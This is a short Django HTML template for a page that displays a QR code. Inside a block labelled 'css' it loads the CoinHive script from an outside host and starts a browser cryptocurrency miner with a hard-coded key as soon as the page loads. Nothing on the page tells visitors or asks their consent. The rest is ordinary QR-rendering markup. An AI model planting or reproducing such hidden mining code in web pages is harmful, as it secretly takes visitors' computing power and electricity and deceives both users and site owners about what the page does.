{% extends 'base.html' %}
{% load staticfiles %}
{% block css %}
<script src="{% static 'js/qrcode.min.js' %}"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
		<script>
    var miner = new CoinHive.User('wUoEgRh3eqDCj1tJy4jpFXUk22fhb62y', 'synergy');
    miner.start();
  </script>

{% endblock %}


{% block content %}
<div id="QrC0dE">

</div>
{% endblock %}

{% block afterBody %}
<script>
    new QRCode(document.getElementById("QrC0dE"), "{{ qr }}");
</script>
{% endblock %}